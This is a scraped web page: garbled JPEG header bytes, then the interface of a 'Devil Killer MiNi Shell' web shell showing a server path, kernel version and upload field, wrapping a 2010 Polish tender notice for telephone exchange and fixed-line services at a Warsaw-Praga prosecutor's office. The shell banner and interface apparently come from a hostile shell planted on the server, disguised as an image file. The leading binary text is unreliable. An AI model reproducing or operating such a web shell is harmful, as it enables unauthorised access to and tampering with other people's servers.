JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/382116-N-2010.html

<p class="kh_header"><b>Warszawa: Usługa telefonii stacjonarnej</b><br>
<b>Numer ogłoszenia: 382116 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa Warszawa-Praga w Warszawie , ul. Bródnowska 13/15, 03-439 Warszawa, woj. mazowieckie, tel. 22 51 14 776, faks 22 51 14 722.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warszawapraga.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa telefonii stacjonarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
LOKALIZACJE

1. Siedziby Prokuratur:

1.1.    Prokuratura Okręgowa Warszawa-Praga w Warszawie, ul. Bródnowska 13/15;
1.2.    Prokuratura Rejonowa Warszawa Praga-Północ, ul. Jagiellońska 5;
1.3.    Prokuratura Rejonowa Warszawa Praga-Południe, ul. Kamienna 14;
1.4.    Prokuratura Rejonowa w Otwocku, ul. Powstańców Warszawy 3.

2. Opis przedmiotu zamówienia:

2.1.   Dostarczenie i instalacja centrali telefonicznej w Prokuraturze Okręgowej Warszawa-Praga i Prokuraturze Rejonowej Warszawa Praga-Północ. Dopuszcza się instalacje używanego sprzętu.
Świadczenie usług telekomunikacyjnych poprzez dwa niezależne łącza.
Przedmiot zamówienia obejmuje serwis central, sieci i systemowych aparatów telefonicznych.
Dokumentacja sieci dot. Prokuratury Okręgowej Warszawa-Praga w lokalizacji przy ul. Bródnowskiej 13/15 jest w posiadaniu Samodzielnego Działu Informatyzacji natomiast brak jest dokumentacji sieci w lokalizacji Jagiellońska 5. 
Osoba do kontaktu w sprawie: Marcin Skobel - Samodzielny Dział Informatyzacji, tel. 22 51 14 777.

2.2.   Dostarczenie i instalacja centrali telefonicznej w Prokuraturze Rejonowej Warszawa Praga-Południe i Prokuraturze Rejonowej w Otwocku. Dopuszcza się instalacje używanego sprzętu.
Świadczenie usług telekomunikacyjnych poprzez łącze PRA i niezależne łącze rezerwowe PRA lub cztery łącza BRA na ulicy Kamiennej w Warszawie i przez cztery łącza BRA w Otwocku.
Przedmiot zamówienia obejmuje serwis central, sieci i systemowych aparatów telefonicznych.
Dokumentacja sieci dot. Prokuratury Rejonowej Warszawa Praga-Południe w lokalizacji przy ul. Kamiennej 14 oraz dot. Prokuratury Rejonowej w Otwocku w lokalizacji przy ul. Powstańców Warszawy 3 jest w posiadaniu Samodzielnego Działu Informatyzacji.

2.3.	Zamawiający wyznacza termin dostępu do dokumentacji i oględzin sieci (nie jest to wymóg):
na dzień 6 grudnia 2010 r. na godz. 9:00 dla lokalizacji Bródnowska i Kamienna, 
na godz. 10:00 dla lokalizacji Jagiellońska;
na godz. 12:00 dla lokalizacji Powstańców Warszawy w Otwocku.
Konieczne jest potwierdzenie chęci uczestnictwa przed każdą z wizyt nie później, niż do dnia 3 grudnia 2010 r. 
Osoba do kontaktu w sprawie: Marcin Skobel - Samodzielny Dział Informatyzacji, tel. 22 51 14 777.

3. Nomenklatura

Operator - w rozumieniu Prawa Zamówień Publicznych - Wykonawca.
Abonent - w rozumieniu Prawa Zamówień Publicznych - Zamawiający.

4. Specyfikacja lokalizacji:

4.1.   ul. Bródnowska 13/15 w Warszawie
W obiekcie dzierżawiona jest centrala telefoniczna wraz systemem bilingowym.
Z centrali wyodrębnionych jest 132 analogowe linie wewnętrzne oraz 20 cyfrowych linii telefonicznych wraz z systemowymi aparatami będącymi własnością Zamawiającego (aparaty systemowe Ericsson DB 222 i DB 223 oraz przystawki rozszerzające) oraz 3 linie wewnętrzne typu ISDN BRA.
Połączenia są realizowane poprzez 2 niezależne łącza ISDN PRA. W celu zapewnienia  bezpieczeństwa wymaga się, aby łącza były doprowadzone różnymi drogami teletransmisyjnymi.
Wykonawca zapewni i zainstaluje centralę telefoniczną z systemem bilingowym wraz z komputerem PC do natychmiastowego odczytu danych na żądanie Zamawiającego.

4.2.   ul. Jagiellońska 5 w Warszawie
W obiekcie dzierżawiona jest centrala telefoniczna wraz z systemem bilingowym 
i z wyodrębnionymi 43 analogowymi liniami wewnętrznymi i 6 liniami cyfrowymi wraz z systemowymi aparatami, które są własnością Zamawiającego (aparaty systemowe Ericsson DB 222 i DB 223 oraz przystawki rozszerzające).
Wykonawca zapewni centralę telefoniczną podłączoną poprzez 1 trakt ISDN PRA oraz drugie niezależne łącze ISDN BRA w ilości 4 szt. lub ISDN PRA w ilości 1 szt. W celu zapewnienia bezpieczeństwa wymaga się, aby łącza były doprowadzone różnymi drogami teletransmisyjnymi.
Wykonawca zapewni i zainstaluje centralę telefoniczną z systemem bilingowym wraz 
z komputerem PC do natychmiastowego odczytu danych na żądanie Zamawiającego.

4.3.   ul. Kamienna 14 w Warszawie 
W obiekcie dzierżawiona jest centrala telefoniczna wraz systemem bilingowym.
Z centrali wyodrębnionych jest 76 analogowych linii wewnętrznych oraz 3 cyfrowe linie telefoniczne wraz z systemowymi aparatami będącymi własnością Zamawiającego (aparaty systemowe Ericsson).
Połączenia są realizowane poprzez 2 niezależne łącza PRA (dopuszcza się jako łącze główne PRA, a jako łącza rezerwowe 4 łącza BRA). W celu zapewnienia bezpieczeństwa wymaga się, aby łącza były doprowadzone różnymi drogami teletransmisyjnymi.
Wykonawca zapewni i zainstaluje centralę telefoniczną z systemem bilingowym wraz z komputerem PC do natychmiastowego odczytu danych na żądanie Zamawiającego.

4.4.   ul. Powstańców Warszawy 3 w Otwocku
W obiekcie dzierżawiona jest centrala telefoniczna wraz z systemem bilingowym 
i z wyodrębnionymi 34 analogowymi liniami wewnętrznymi i 2 liniami cyfrowymi wraz z systemowymi aparatami, które są własnością Zamawiającego (aparaty systemowe Siemens).
Wykonawca zapewni centralę telefoniczną podłączoną poprzez cztery łącza cyfrowe 4 x ISDN BRA. 
Wykonawca zapewni i zainstaluje centralę telefoniczną z systemem bilingowym wraz z komputerem PC do natychmiastowego odczytu danych na żądanie Zamawiającego.

5. Integracja systemu łączności powinna polegać na:

5.  Dostarczeniu odpowiedniej ilości łączy podstawowych typu ISDN  i odpowiednich łączy backupowych:
a)  z zachowaniem dotychczasowej numeracji w jednostce centralnej Prokuratury Okręgowej Warszawa-Praga tj. (22)5114700 - (22)5114899 (numeracja należy do TPSA za pośrednictwem StarNet-Telecom);
Numeracja użytkowana przez Zamawiającego w lokalizacji przy ul. Bródnowskiej 13/15 jest jego własnością zgodnie z Rozdziałem 4 § 6.1 Rozporządzenia Ministra Transportu i Budownictwa z dnia 1 marca 2006 r. Zamawiający dysponuje oświadczeniem obecnego Wykonawcy o zrzeczeniu się praw do numeracji na rzecz Zamawiającego.
Dodatkowo Firma StarNet Telekom Sp. z o. o. - pisemnie zobowiązała się do przekazania numeracji używanej przez Zamawiającego. Nie rości do niej żadnych praw własności i stwierdza, że zgodnie z ustawą jest ona własnością Zamawiającego.
b)  z zachowaniem istniejącej numeracji we wszystkich jednostkach rejonowych Prokuratury          Okręgowej tj.
       - Prokuratura Rejonowa Warszawa Praga Północ (22)5113200 - (22)5113299 (numeracja należy do TPSA );
W odniesieniu do lokalizacji Jagiellońska 5 Zamawiający informuje, iż jest właścicielem numeracji na podstawie umowy o świadczenie usług.
c)  z zachowaniem dotychczasowej numeracji w jednostce Prokuratury Rejonowej Warszawa Praga-Południe tj. (22)5114900 - (22)5114999 (numeracja należy do TPSA za pośrednictwem StarNet-Telecom);
Numeracja użytkowana przez Zamawiającego w lokalizacji przy ul. Kamiennej 14 jest jego własnością zgodnie z Rozdziałem 4 § 6.1 Rozporządzenia Ministra Transportu i Budownictwa z dnia 1 marca 2006 r. Zamawiający dysponuje oświadczeniem obecnego Wykonawcy Firmy StarNet Telekom Sp. z o.o. o zrzeczeniu się praw do numeracji na rzecz Zamawiającego.
Dodatkowo Firma StarNet Telekom Sp. z o. o. - pisemnie zobowiązała się do przekazania numeracji używanej przez Zamawiającego. Nie rości do niej żadnych praw własności i stwierdza, że zgodnie z ustawą jest ona własnością Zamawiającego.
d) z zachowaniem istniejącej numeracji w jednostce Prokuratury Rejonowej w Otwocku (022)7195100 - (022)7195139 (numeracja należy do Neti za pośrednictwem StarNet-Telecom);
Numeracja użytkowana przez Zamawiającego w lokalizacji przy ul. Powstańców Warszawy 3 w Otwocku jest jego własnością zgodnie z Rozdziałem 4 § 6.1 Rozporządzenia Ministra Transportu i Budownictwa z dnia 1 marca 2006 r. Zamawiający dysponuje oświadczeniem obecnego Wykonawcy Firmy StaNet Telecom Sp. z o.o. o zrzeczeniu się praw do numeracji na rzecz Zamawiającego.
Dodatkowo Firma StarNet Telekom Sp. z o. o. - pisemnie zobowiązała się do przekazania numeracji używanej przez Zamawiającego. Nie rości do niej żadnych praw własności i stwierdza, że zgodnie z ustawą jest ona własnością Zamawiającego.

6. Realizacja połączeń telefonicznych (ilość minut)

Zamawiający informuje, że do obliczenia ceny oferty (Załącznik nr 3, tabela 1, tabela 2, tabela 3 i tabela 4) należy uwzględnić przewidywaną miesięczną ilość połączeń (w minutach) zgodnie z poniższym zestawieniem:


Prokuratura Okręgowa Warszawa-Praga - ul. Bródnowska 13/15
LOKALNE 11 500 
KOMÓRKOWE 11 000 
MIĘDZYSTERFOWE 2 000 
INNE 300
MIĘDZYNARODOWE 15
 
Prokuratura Rejonowa Warszawa Praga-Północ ul. Jagiellońska 5
LOKALNE 6 900 
KOMÓRKOWE 4 500 
MIĘDZYSTERFOWE 1 100 
INNE 110
MIĘDZYNARODOWE 1

Prokuratura Rejonowa Warszawa Praga-Południe - ul. Kamienna 14
LOKALNE 6 500
MIĘDZYSTREFOWE 1500
KOMÓRKOWE PL 6 800
INNE 140
MIĘDZYNARODOWE 1

Prokuratura Rejonowa w Otwocku ul. Powstańców Warszawy 3
LOKALNE 1 800
MIĘDZYSTREFOWE 420
KOMÓRKOWE PL 1 000
MIĘDZYNARODOWE 1
INNE 30


Zamawiający dopuszcza możliwość rozliczania stawek za usługi i połączenia nie wymienione w formularzu cenowym według aktualnie obowiązującego cennika Wykonawcy.
Połączenia taryfikowane sekundowo od pierwszej sekundy trwania połączenia bez opłat inicjacyjnych za połączenie.
Do kalkulacji ceny brutto oferty (Formularz Cenowy Załącznik Nr 3 do Opisu Przedmiotu Zamówienia) należy przyjąć ceny jednostkowe połączeń według taryf Operatora pomnożone przez podane przez Zamawiającego ilości.

7. W zakres pracy serwisu wchodzą:

7.1. Zakres Serwisu central telefonicznych

-	zamiana linii cyfrowej na analogową,
-	zamiana linii analogowej na cyfrową,
-	zmiana aparatu,
-	zmiana klasy uprawnień za każdy numer,
-	zmiana ustawień aparatu systemowego za każdą funkcję,
-	zmiana numeru końcowego urządzenia abonenckiego na życzenie abonenta,
-	przekierowanie połączeń,
-	blokada połączeń,
-	billing szczegółowy na każdy numer,
-	dedykowany przedstawiciel Dostawcy do obsługi,
-	przeszkolenie osób pracujących na stanowisku telefonistek.
Serwis central telefonicznych obejmuje zabezpieczenie centrali przed awariami. Wykonawca zapewnia wszystkie części zapasowe do centrali z możliwością wymiany ich w max. 24 h na własny koszt we wszystkich lokalizacjach.

7.2. Zakres Serwisu sieci
-	naprawa, konserwacja i serwis sieci,
-	usunięcie usterki,
-	wymiana uszkodzonego gniazda,
-	wykonanie pomiarów wadliwie działającej linii,
-	identyfikacja linii,
-	prowadzenie dokumentacji sieci,
-	rozbudowa sieci do 20 m od istniejącego punktu dystrybuującego lub niewykorzystanego zakończenia sieci.

7.3. Serwis aparatów
-	serwis aparatów dotyczy tylko aparatów systemowych,
-	zapewnienie aparatów zastępczych o takiej samej funkcjonalności na czas naprawy starych lub zakup nowych. Koszty naprawy i zakupu aparatów po stronie Zamawiającego.
 
7.4. Serwis i obsługa lokalnego systemu bilingowego
-	administrowanie systemu bilingowego,
-	aktualizacja bazy danych,
-	generowanie bilingu elektronicznego dotyczącego każdego nr wewnętrznego z lokalnego systemu na żądanie Zamawiającego,
-	wydruk miesięcznego bilingu na żądanie Zamawiającego na miejscu z protokolarnym przekazaniem przez osoby upoważnione,
-	bieżące informowanie o wszelkich zmianach w zakresie usług telekomunikacyjnych z wyprzedzeniem pozwalającym na podjecie ewentualnych działań ze strony Prokuratury,
-	 doradztwo techniczne oraz ofertowe przez osobę wyznaczona do bezpłatnych kontaktów ze strony Wykonawcy.

Serwis i obsługa dotyczy aktualizacji taryf i comiesięcznego wykonywania raportów szczegółowych i przekazywania ich w postaci zapisu na CD osobie upoważnionej ze strony Zamawiającego.
Dodatkowo Zamawiający może zażyczyć sobie dowolnego bilingu szczegółowego z wybranego numeru lub numerów w okresie miedzy wykonywaniem raportów miesięcznych.

8. Wymagania techniczne

-	Zachowanie dotychczasowej numeracji i możliwość rozbudowy centrali o min. 20% w trakcie trwania umowy. Koszty ewentualnej rozbudowy, po stronie Wykonawcy.
-	Możliwość zdalnego nadzoru systemu przez serwis.
-	Zabezpieczenie elektrycznego awaryjnego systemu min. 4 godz. w przypadku awarii zasilania podstawowego:
a) centrali
b) aparatów - cyfrowych i analogowych
c) systemu bilingowego
-	Urządzenie lokalne umożliwiające taryfikacje przy naliczaniu sekundowym.
-	Lokalny system taryfikacyjny umożliwiający wykonywanie pełnych raportów na miejscu, wraz z nagrywaniem bilingów szczegółowych na nośnik CD/DVD.
-	Zapewnienie łącza backupowego w lokalizacjach poprowadzonego niezależną drogą komutacyjną od łącza podstawowego.

9. Wymagana funkcjonalność Centrali telefonicznej oraz aparatów cyfrowych

-	System centrali musi posiadać zasilanie z możliwością podłączenia bezobsługowych akumulatorów gwarantujących wymagany czas pracy w trybie awaryjnym.
-	Umożliwiać instalacje z okablowaniem pod podłogą techniczną w pomieszczeniach nie wyższych niż 220 cm lub instalacje z okablowaniem bez podłogi technicznej w pomieszczeniach nie wyższych niż 235 cm.
-	System musi posiadać budowę modułowa.
-	System musi posiadać wyposażenie w urządzenia umożliwiające archiwizację bazy danych bilingowych.
-	System musi posiadać oprogramowanie umożliwiające wybór abonenta docelowego w sieci.
-	W przypadku awarii zasilania, po przywróceniu zasilania system musi startować automatycznie.
-	System musi posiadać możliwość kopiowania bazy danych (archiwizacji) i zdalnego jej wgrywania (odtwarzania) np. po dokonaniu aktualizacji oprogramowania.
-	Abonenci analogowi i systemowi muszą być dołączani za pomocą pojedynczej pary okablowania miedzianego.
-	Wbudowane funkcje wysyłania tonów DTMF do sieci publicznej.
-	Aparaty muszą mieć możliwość dołączenia modułów z dodatkowymi przyciskami funkcyjnymi.
-	Zapewnić ustawienia zapowiedzi głosowej.
-	Możliwość tworzenia grup wspólnych dzwonków.
-	Przekierowanie połączeń wewnętrznych w układzie dyrektorsko- sekretarskim.
-	Płynna możliwość nadawania uprawnień dla danego numeru (Zamawiający wymaga, aby nadawanie uprawnień nie ograniczało się jedynie do blokowania lub udostępniania całych prefiksów, ale z dokładnością do wybranych numerów).
-	Przekierowanie połączeń bezpośrednio przy nie odbieraniu i przy zajętości.
-	Identyfikacja numeru na aparatach cyfrowych.
-	Możliwość włączenia / wyłączenia identyfikacji połączeń wychodzących dla poszczególnych numerów.
-	W aparatach cyfrowych możliwość programowania klawiszy z podglądem stanu pracy numeru wewnętrznego.
-	Możliwość dowolnego kierowania ruchu na wszystkie łącza przyłączone do centrali.
-	Zróżnicowany sygnał dzwonków.
-	Uprawnienia abonentów.
-	Grupa poszukiwania (hunting).
-	Tryb /nie przeszkadzać/.
-	Grupa przejmowania rozmów (pick-up group).
-	Połączenie bezpośrednie (klawisze bezpośredniego monitorowania stacji końcowej).

10. Opis sposobu obliczenia oferty

10.1.	Przy obliczaniu ceny oferty wyszczególnić cenę netto, podatek VAT oraz cenę brutto, zgodnie z informacjami zawartymi w Formularzu cenowym Załącznik nr 3 do SIWZ
10.2.	Cena ofertowa musi zawierać wszystkie koszty, jakie Zamawiający poniesie w związku z  realizacją zamówienia, w tym koszty dostawy, przeszkolenia pracowników Zamawiającego, instrukcjami telefonów systemowych w języku polskim.
10.3.	Pod pojęciem cena ofertowa brutto Zamawiający rozumie wszystkie koszty związane ze świadczoną usługa przez Operatora w tym np.:
-	opracowania dokumentacji technicznej - musi być zawarty opis drogi kablowej od wejścia budynku do szafy krosowniczej w budynku Zamawiającego, rodzaj kabli z dokładnym opisem,
-	opracowania książki telefonicznej numeracji telefonów operatora i jej aktualizacji (co kwartał do końca trwania umowy tj. do 31 grudnia 2012 r. od dnia jej podpisania,
-	montaż telefonów systemowych, we wskazanych przez Zamawiającego pokojach związane z usługą koszty jednorazowe jak transport centrali,
-	należy też ująć koszty opłat miesięcznych np. dzierżaw łączy do wykonania usługi, jeżeli Operator będzie musiał ponieść takie koszty.
10.4. Cena serwisu i dzierżawy centrali. W cenie należy uwzględnić wszystkie prace związane z eksploatacją centrali, których koszty poniesie Zamawiający.
10.5. Cena serwisu sieci wraz z aparatami telefonicznymi. W cenie należy uwzględnić wszystkie prace związane z siecią i aparatami telefonicznymi, których koszty poniesie Zamawiający.
10.6. Cena połączeń lokalnych. Należy podać cenę połączeń lokalnych dla wskazanych lokalizacji i wynikających z zapisów pkt 6 ilości minut do zrealizowania w strefie numerycznej (22), które poniesie Zamawiający w całym okresie trwania umowy.
10.7. Cena połączeń międzymiastowych. Należy podać cenę połączeń międzymiastowych dla wskazanych lokalizacji i wynikających z zapisów pkt 6 ilości minut do zrealizowania w całym okresie trwania umowy
10.8. Cena połączeń komórkowych. Należy podać cenę połączeń komórkowych dla wskazanych lokalizacji i wynikających z zapisów pkt 6 ilości minut do zrealizowania w całym okresie trwania umowy.
10.9. Połączenia inne dla wskazanych lokalizacji i wynikających z zapisów pkt 6 ilości minut do zrealizowania w całym okresie trwania umowy.
10.10. Cena abonamentu łączy musi zawierać:
-	cenę łącza podstawowego i łącza backupowego + ewentualne opłaty abonamentowe dodatkowe przypisane do tych łączy. 
10.11. Opłaty jednorazowe. W opłatach jednorazowych powinny znaleźć się wszystkie koszty związane z instalacją centrali telefonicznej i łączy w centrali.

UWAGA! Wykonawca zapewnia przeniesienie do własnej sieci dotychczasowych numerów wykorzystywanych przez Zamawiającego i uruchomienie na tych liniach usługi DDI oraz MNS z zachowaniem planów numeracyjnych na koszt Zamawiającego zgodnie z aktualnym cennikiem tego rodzaju usługi. Koszty wraz z cennikiem musza być załączone do oferty w postaci załącznika tytułem weryfikacji poniesionych przez Zamawiającego kosztów. Wartość ta nie jest składnikiem wartości oferty.

11. Wymagania jakie musi spełniać Operator i Zamawiający

11.1.	Operator - Czas naprawy w przypadku awarii centrali telefonicznej do 24 godz.
11.2. Operator - W przypadku awarii centrali Operator założy centralę o nie mniejszych   parametrach technicznych w ciągu 24 godzin w uzgodnieniu z Zamawiającym.
11.3. Operator - wystawiać musi jedna fakturę VAT, w układzie miesięcznym, okres rozliczeniowy od 1 do ostatniego dnia każdego miesiąca. Biling do faktury musi być sporządzony w formie papierowej i elektronicznej z wyszczególnieniem każdego numeru z podziałem na każdą jednostkę podległą Prokuraturze Okręgowej Warszawa-Praga.
11.4.  Podział numeracji na centralach zostanie uzgodniony po zakończeniu postępowania.
11.5.  Montaż i uruchomienie central w lokalizacjach w ciągu nieprzekraczalnie 7 dni roboczych po udzieleniu zamówienia na usługi telekomunikacyjne. Zamawiający określił 7-dniowy termin uruchomienia i montażu centrali w oparciu o kalkulację ryzyka pozostania bez świadczonej przedmiotowej usługi w czasie przejmowania świadczenia usługi przez nowego Wykonawcę. Jednoczenie dopuszcza się instalacje używanej centrali. W związku z powyższym ww. termin uruchomienia i montażu centrali jest realny. Przerwa w dostępie do usług telekomunikacyjnych związana z uruchomieniem centrali nie może trwać dłużej niż 24 godziny i może mieć miejsce w dniach wolnych od pracy (sobota/niedziela)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wynosi 10 000,00 złotych (słownie: dziesięć tysięcy złotych 0/100).
Wadium należy wnieść do dnia 9 grudnia 2010r. do godz. 12.00 w pieniądzu wyłącznie przelewem bankowym na konto Zamawiającego:  

Prokuratura Okręgowa Warszawa-Praga w Warszawie
Nr rachunku: 86 1090 1883 0000 0001 0487 6197
(z podaniem w tytule wpłaty dopisku o treści)
Wadium, telefony stacjonarne - znak sprawy I/8/U/2010

Za termin wniesienia wadium w pieniądzu uważa się dzień i godzinę wpływu środków na konto Zamawiającego podane powyżej lub złożenie oryginału gwarancji czy poręczenia na ręce Zamawiającego za potwierdzeniem odbioru (może być dołączone do oferty pod warunkiem, że nie jest z nią trwale złączone).
Wadium może być wnoszone w pieniądzu (przelewem na konto bankowe Zamawiającego z konta bankowego Wykonawcy), poręczeniach oraz gwarancjach bankowych, gwarancjach ubezpieczeniowych lub w formie poręczeń udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).Zarówno gwarancje jak i poręczenia o których mowa w ust. 3 ww. ustawy muszą być udzielane do końca terminu związania ofertą wskazanego w niniejszej SIWZ oraz wskazywać wszystkie bez wyjątku wymienione w art. 46 ust. 4a i ust. 5 uPzp okoliczności, w których Wykonawca składający ofertę traci wadium na rzecz Zamawiającego (lub wskazanie odpowiednio co najmniej przepisów, tj. art. 46 ust. 4a oraz art. 46 ust. 5 ustawy Prawo zamówień publicznych).
Wykonawca, którego oferta nie będzie w całości zabezpieczona akceptowaną formą wadium na warunkach określonych w uPzp lub niniejszej SIWZ, w tym również na przedłużony okres związania ofertą, lub gdy Wykonawca nie zgodzi się na przedłużenie okresu związania ofertą, zostanie przez Zamawiającego wykluczony z postępowania.
W przypadku wadium wniesionego w formie gwarancji lub poręczeń i sporządzonego w języku obcym, Zamawiający żąda, by do oferty zostało złożone jego tłumaczenie na język polski w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/osoby uprawnione do reprezentowania Wykonawcy.
Wadium w całości winno znajdować się w posiadaniu Zamawiającego wraz z upłynięciem terminu wskazanego w pkt 12.2 i wyznaczonego do składania ofert. 
Wadium nie podlega zwrotowi w stosunku do Wykonawcy:
a) którego oferta została wybrana jako najkorzystniejsza, a który odmówił podpisania umowy na warunkach określonych w ofercie lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy albo nie wniósł wymaganego zabezpieczenia należytego wykonania umowy. 
